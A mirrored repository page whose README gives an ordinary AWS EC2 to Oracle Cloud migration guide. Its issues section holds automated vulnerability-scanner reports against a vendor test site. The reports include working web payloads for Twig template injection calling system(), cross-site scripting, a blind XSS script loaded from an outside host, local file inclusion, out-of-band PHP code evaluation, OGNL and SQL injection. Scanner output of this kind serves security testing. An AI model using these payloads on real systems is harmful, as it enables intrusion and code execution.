Giter Site home page Giter Site logo

cloudmigration's Introduction

#README#

AWS to OCI Cloud Migration

The Word doc includes screenshots for those who would like the visuals to supplement.

Exporting/Importing AWS EC2 Instance to Oracle Cloud Infrastructure

Prerequisites https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#vmexport-prerequisites

EXPORT RESTRICTIONS ARE AT THE BOTTOM OF THE DOCUMENTATION

Steps (If you have created an EC2 Instance, S3 Bucket, and configured IAM Policies. SKIP to Step 4)

  1. Create EC2 Instance
  2. Create S3 Bucket
  3. Create IAM Groups/Policies
  4. Add a new Canonical ID to grant access to the Bucket. For all regions in the U.S/Canada your Canonical ID will be (this is also in the documentation linked above): c4d8eabf8db69dbe46bfe0e517100c554f01200b104d59cd408e777ba442a322
  5. Next you’ll SSH into your EC2 Instance
  6. Ensure that you’ve installed Pip and Python
  7. Install and Configure AWS CLI a) https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-install.html b) https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-configure.html

Config Example (Ensure you’re in the same region as your instance. Default output format is up to user but for demonstration purposes I chose json)

  1. Begin the Export Process a. (Overview) https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#vmexport-limits b. (Create Instance Export Task Example Detailed) https://docs.aws.amazon.com/cli/latest/reference/ec2/create-instance-export-task.html c. Example code: aws ec2 create-instance-export-task --description "RHEL5 instance" --instance-id [instance id] --target-environment vmware --export-to-s3-task DiskImageFormat=vmdk,ContainerFormat=ova,S3Bucket=[bucketname],S3Prefix=RHEL5

  2. Your Instance will reboot. It’ll take about 5 min or so for it to upload to S3

  3. Download your Instance from S3

  4. Log into OCI and Navigate to Object Storage

  5. Create your Object Storage bucket and upload your Object

  6. Copy the Object URL (DO NOT MAKE A PAR)

  7. Navigate to Compute > Custom Images > Import Image

  8. Enter information and URL then Import

  9. Wait for the Image to Import (Takes 5 – 10 minutes depending on size)

  10. Create VCN and ALL related resources

  11. After the Custom Image is imported you may create an instance then access it via your SSH. However, you will ssh with @ec2-user instead of @opc but will use the OCI Public IP. Also, to begin any programs on there you will need to use the sudo command to launch. For example if you have a web server. Instead of doing apachectl start, you’ll do sudo apachectl start.

Export Restrictions Exporting instances and volumes is subject to the following limitations: • You cannot export a VM if it contains third-party software provided by AWS. For example, VM Export cannot export Windows or SQL Server instances, or any instance created from an image in the AWS Marketplace. • You must export your instances and volumes to one of the following image formats that your virtualization environment supports: o Open Virtual Appliance (OVA), which is compatible with VMware vSphere versions 4, 5, and 6. o Virtual Hard Disk (VHD), which is compatible with Citrix Xen and Microsoft Hyper-V virtualization products. o Stream-optimized ESX Virtual Machine Disk (VMDK), which is compatible with VMware ESX and VMware vSphere versions 4, 5, and 6. • You can't export Amazon EBS data volumes. • You can't export an instance that has more than one virtual disk. • You can't export an instance that has more than one network interface. • You can't export an instance from Amazon EC2 if you've shared it from another AWS account. • You can't have more than five export tasks per Region in progress at the same time. • VMs with volumes larger than 1 TiB are not supported. • You can export a volume to either an unencrypted S3 bucket or to a bucket encrypted using SSE-S3. You cannot export to an S3 bucket encrypted using SSE-KMS.

cloudmigration's People

Contributors

louisianatiger avatar

Watchers

 avatar

cloudmigration's Issues

Vulnerability - Code Execution via SSTI (PHP Twig)

URL: http://php.testsparker.com/artist.php?id={{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("SET /A 268409241 - 8073")}}
Name: Code Execution via SSTI (PHP Twig)
Severity: Critical
Confirmed: True

ParameterName: id
ParameterType: GET
Payload: {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("SET /A 268409241 - 8073")}}

You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/a6130f4da4f047fc1a28ad64041a8564

Vulnerability - Cross-site Scripting

URL: http://php.testsparker.com/artist.php?id=<scRipt>netsparker(0x03EA5C)</scRipt>
Name: Cross-site Scripting
Severity: High
Confirmed: True

ParameterName: id
ParameterType: GET
Payload: <scRipt>netsparker(0x03EA5C)</scRipt>

Proof URL :
http://php.testsparker.com/artist.php?id=%3cscRipt%3ealert(0x03EA5C)%3c%2fscRipt%3e

You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/a4bd4f2e58d14c794b1dad64041a9435

Vulnerability - [Possible] Blind Cross-site Scripting

URL: http://php.testsparker.com/products.php?pro=&#39;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt src="//jlcxsvyefhyzkeqaieedq2giznn1torh-hn0m2ywsrg&#46;r87&#46;me"></scRipt>
Name: [Possible] Blind Cross-site Scripting
Severity: High
Certainty: 70%

ParameterName: pro
ParameterType: GET
Payload: '"--></style></scRipt><scRipt src="//jlcxsvyefhyzkeqaieedq2giznn1torh-hn0m2ywsrg.r87.me"></scRipt>

You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/7d9c50fdef9e40199a20ad64041daa64

Vulnerability - Local File Inclusion

URL: http://php.testsparker.com/process.php?file=/../../../../../../../../../../windows/win.ini%00.nsp
Name: Local File Inclusion
Severity: High
Confirmed: True

ParameterName: file
ParameterType: GET
Payload: /../../../../../../../../../../windows/win.ini%00.nsp

[IAST] Source File :
C:/AppServ/www/process.php on line 25

[IAST] Extra Information :
"include" was called. Payload: /../../../../../../../../../../windows/win.ini�.nsp

You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/131f1de5ce8f4000a99dad640419c516

Vulnerability - Internal Server Error

URL: http://php.testsparker.com/artist.php?id=%{#context[&quot;com.opensymphony.xwork2.dispatcher.HttpServletResponse&quot;].addHeader(&quot;a&quot;,268409241-87309)}
Name: Internal Server Error
Severity: Low
Confirmed: True

ParameterName: id
ParameterType: GET
Payload: %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-87309)}

Page Type :
Other

You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/7ec08207d11645ba02aaad64041a7da0

Vulnerability - Cross-site Scripting

URL: http://php.testsparker.com/products.php?pro=&#39;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;netsparker(0x03E6FE)&lt;/scRipt>
Name: Cross-site Scripting
Severity: High
Confirmed: True

ParameterName: pro
ParameterType: GET
Payload: '"--></style></scRipt><scRipt>netsparker(0x03E6FE)</scRipt>

Proof URL :
http://php.testsparker.com/products.php?pro=&#39;%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x03E6FE)%3C/scRipt%3E

You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/2eedc35206524f24e103ad64041a7904

Vulnerability - Out of Band Code Evaluation (PHP)

URL: http://php.testsparker.com/hello.php?name=+gethostbyname(trim(&#39;jlcxsvyefhmttrq1l0_a4v3toqijhfq6xfry3yzq&#39;.&#39;31m.r87.me&#39;));//
Name: Out of Band Code Evaluation (PHP)
Severity: Critical
Confirmed: True

ParameterName: name
ParameterType: GET
Payload: +gethostbyname(trim('jlcxsvyefhmttrq1l0_a4v3toqijhfq6xfry3yzq'.'31m.r87.me'));//

You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/126def9424c74bfc986aad64041daa17

Vulnerability - SQL Injection (IAST)

URL: http://php.testsparker.com/artist.php?id=482810 434075
Name: SQL Injection (IAST)
Severity: Critical
Confirmed: True

ParameterName: id
ParameterType: GET
Payload: 482810 434075

[IAST] Source File :
C:/AppServ/www/Programmatic/mysqlCall.php on line 89

[IAST] Extra Information :
"mysql_query" was called.
Stack trace:

  1. mysqlCallClassicWith2Groups([string] "482810 434075", [string] "numeric", [string] "SQS") Payload: SELECT * FROM actor WHERE ((actor_id = 482810 434075 ));

You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/631e17a592724ecf0fa9ad720370d64f

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.